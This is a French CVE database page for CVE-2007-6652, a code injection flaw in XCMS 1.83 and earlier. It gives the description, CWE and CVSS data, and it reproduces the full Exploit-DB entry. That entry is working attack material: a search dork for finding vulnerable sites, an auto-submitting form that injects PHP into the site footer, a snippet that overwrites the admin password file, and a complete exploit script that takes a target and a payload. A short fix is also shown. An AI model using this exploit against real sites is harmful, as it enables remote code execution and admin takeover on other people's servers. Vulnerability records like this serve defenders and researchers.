CVE-2007-6652

Catégories

Code Injection

OWSAP

A03-Injection

EPSS

6.15%V3

Vecteur

Network

Publié

2008-01-04 10:00 +00:00

Dernière modif.

2017-09-28 10:57 +00:00

Liens officiels

CVE.org

NVD

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des alertes

Liste des Alertes

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez sécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2024-1234

Planificiations

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions

cpie.php in XCMS 1.83 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to conduct direct static code injection attacks and execute arbitrary code via the testo_0 parameter in a cpie admin action to index.php, which writes to dati/generali/footer.dtb (aka the XCMS footer).

Informations

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE-94	Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metric	Score	Sévérité	CVSS Vecteur	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 4813

Date de publication : 2007-12-29 23:00 +00:00
Auteur : x0kster
EDB Vérifié : Yes

Name : XCMS <= v1.83 Remote Command Execution Vulnerability Author : x0kster Email : x0kster@gmail.com Site : ihteam.net Script Download : http://www.xcms.it Date : 28/12/2007 Dork : inurl:"mod=notizie" The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms. Taking "home.php" for example: So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel. So let's take a look to the bugged code. So with a simple html form we can change the footer. Ex:

<?php YOUR PHP CODE ?></textarea>
        <input type="submit" value="Modifica" />
        </form>
        <script>document.editor.submit()</script>

Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.

Trick: We can change the admin panel password by inserting this code in the footer:

<?php
       $pwd = "owned"; // <- Place here your new password.
       $pwd2 = md5($pwd);
       unlink("dati/generali/pass.php");
	   $f = fopen("dati/generali/pass.php",w);
       fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
       fclose($f);
       ?>

This code delete the old password file and then create a new one with your new password.

Fix:

<?php
         //cpie.php
         [...]
         if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
         [...]
         if(isset($_POST['salva'])){
            Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
         }
         [...]
       ?>

So this is a simple exploit:

<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
echo"
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork  :  inurl:\"mod=notizie\"
by x0kster
Visit ihteam.net
</pre>
<form method=POST action=".$_POST['PHP_SELF'].">
<pre>
Site     :
<input type=text name=site />
Code     :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>

# milw0rm.com [2007-12-30]</div>

<h3>Products Mentioned</h3>

<h4>Configuraton 0</h4><p>Xcms>>Xcms >> Version  To (including) 1.83<ul></ul></p>            <div class="separator my-10"></div>

<h3>References</h3><div style='margin-bottom: 10px;'><a href='https://www.exploit-db.com/exploits/4813' target='_blank'>https://www.exploit-db.com/exploits/4813 <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : exploit, x_refsource_EXPLOIT-DB</span></div><div style='margin-bottom: 10px;'><a href='https://exchange.xforce.ibmcloud.com/vulnerabilities/39346' target='_blank'>https://exchange.xforce.ibmcloud.com/vulnerabilities/39346 <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : vdb-entry, x_refsource_XF</span></div><div style='margin-bottom: 10px;'><a href='http://secunia.com/advisories/28256' target='_blank'>http://secunia.com/advisories/28256 <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : third-party-advisory, x_refsource_SECUNIA</span></div><div style='margin-bottom: 10px;'><a href='http://osvdb.org/40277' target='_blank'>http://osvdb.org/40277 <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : vdb-entry, x_refsource_OSVDB</span></div><div class="separator my-10"></div>                            </div>
                        </div>

</div>
                </div>
            </div>
        </div>
                <script type="application/ld+json">
        {
            "@context": "https://schema.org",
          "@type": "NewsArticle",
          "headline": "Information about the CVE-2007-6652 vulnerability.",
          "datePublished": "2008-01-04T10:00:00+00:00",
          "dateModified": "2017-09-28T10:57:01+00:00",
          "author": [{
            "@type": "Organization",
              "name": "The MITRE Corporation",
              "url": "https://www.cve.org"
            },{
              "@type": "Organization",
              "name": "CVE Find",
              "url": "https://www.cvefind.com"
          }]
        }
        </script>
        
 
                    
                            <div class="footer py-4 d-flex flex-lg-column" id="kt_footer">
            <div class="container-xxl d-flex flex-column flex-md-row align-items-center justify-content-between">
                <div class="text-gray-900 order-2 order-md-1">
                    <span class="text-muted fw-semibold me-1">2024©</span>
                    <a href="https://www.tesweb.com" target="_blank" class="text-gray-800 text-hover-primary">tesweb SA</a>
                </div>
                <ul class="menu menu-gray-600 menu-hover-primary fw-semibold order-1">

<li class="menu-item">
                        <a href="/fr/official.html" class="menu-link px-2">Database Partners</a>
                    </li>
                    <li class="menu-item">
                        <a href="/fr/gdpr.html" class="menu-link px-2">GDPR</a>
                    </li>
                    <li class="menu-item">
                        <a href="/fr/contact.html" class="menu-link px-2">Contact</a>
                    </li>
                    <li class="menu-item">
                        <a href="/fr/plan-price.html" class="menu-link px-2">Purchase</a>
                    </li>
                    <li class="menu-item">
                        <a href="https://www.linkedin.com/company/cve-find/" class="menu-link px-2" target="_blank"><img src="/media/social/linkedin.svg" width="40" height="40"/></a>
                    </li>
                    <li class="menu-item">
                        <a href="https://www.facebook.com/people/CVE-Find-Alert/61561116452093/" class="menu-link px-2" target="_blank"><img src="/media/social/facebook.svg" width="40" height="40"/></a>
                    </li>
                    <li class="menu-item">
                        <a href="https://x.com/cvefindcom" class="menu-link px-2" target="_blank"><img src="/media/social/twitter.svg" width="40" height="40"/></a>
                    </li>
                </ul>
            </div>
        </div>

</div>
            </div>
        </div>

<div id="gdpr" style="background: linear-gradient(0deg, rgba(56,63,72,1) 0%, rgba(56,63,72,0.7) 100%);position: fixed;bottom:0;width: 100%;z-index:9999;padding:8px;color:white;">
                    <div class="row" style="">
                        <div class="col-md-2">
                            <div class="form-check form-switch form-check-custom form-check-solid">
                                <input class="form-check-input" type="checkbox" value="" name="gdprswitchall" data-tesweb="all" checked="checked" />
                                <label class="form-check-label" for="flexSwitchChecked">
                                    Tout accepter                                </label>
                            </div>

</div>
                        <div class="col-md-2" style="text-align:center;">
                            <button type="button" class="btn btn-light-primary" id="closeGdpr">
                                <i class="ki-duotone ki-cross"><span class="path1"></span><span class="path2"></span></i>
                                Fermer</button>
                            <br>
                            <a href="/fr/gdpr.html" title="GDPR" style="color:white;">Plus d'informations</a>
                        </div>
                        <div class="col-md-8">
                            <span data-tesweb-action="accepte" style="display:none">Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site.</span>
                            <span data-tesweb-action="noaccepte" style="display:none">Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.</span>
                        </div>
                    </div>
                </div>

<script>var hostUrl = "assets/";</script>
                
                <script src="/plugins/global/plugins.bundle.js"></script>
                <script src="/js/scripts.bundle.js"></script>

<script src='https://www.cvefind.com/plugins/custom/datatables/datatables.bundle.js'></script>
<script src='https://www.cvefind.com/js/app/bloc/cve/epss.js'></script>
<script src='https://www.cvefind.com/js/aceeditor/ace.js'></script>
<script src='https://www.cvefind.com/js/app/bloc/cve/exploitdb.js'></script>

<script async src="https://www.googletagmanager.com/gtag/js?id=G-BK1SCP8YYK"></script>
                <script>
                    window.dataLayer = window.dataLayer || [];
                    function gtag(){dataLayer.push(arguments);}
                    gtag('js', new Date());
                    gtag('config', 'G-BK1SCP8YYK');
                </script>

</body>
        </html>

Listes Vulnérabilités

Classé par Année

Statistiques CVE

Vues spécifiques

Listes des Vendeurs

Listes des Produits

Listes CWE

Vues spécifiques

7 Derniers CWE

Listes CAPEC

Vues spécifiques

7 derniers CAPEC

CVE-2007-6652

Alerte pour un CVE

Fonctionnalité nécessitant une connexion

Descriptions

Informations

Faiblesses connexes

Metrics

EPSS

EPSS Score

EPSS Percentile

Informations sur l'Exploit

Exploit Database EDB-ID : 4813

Listes Vulnérabilités

Classé par Année

Statistiques CVE

Vues spécifiques

CVE

OWASP

CISA KEV

Listes des Vendeurs

Listes des Produits

Listes CWE

Vues spécifiques

7 Derniers CWE

Listes CAPEC

Vues spécifiques

7 derniers CAPEC

No result found

CVEFind - Alertes CVE

CVE-2007-6652 : Détail

CVE-2007-6652

Alerte pour un CVE

Descriptions

Informations

Faiblesses connexes

Metrics

EPSS

EPSS Score

EPSS Percentile

Informations sur l'Exploit

Exploit Database EDB-ID : 4813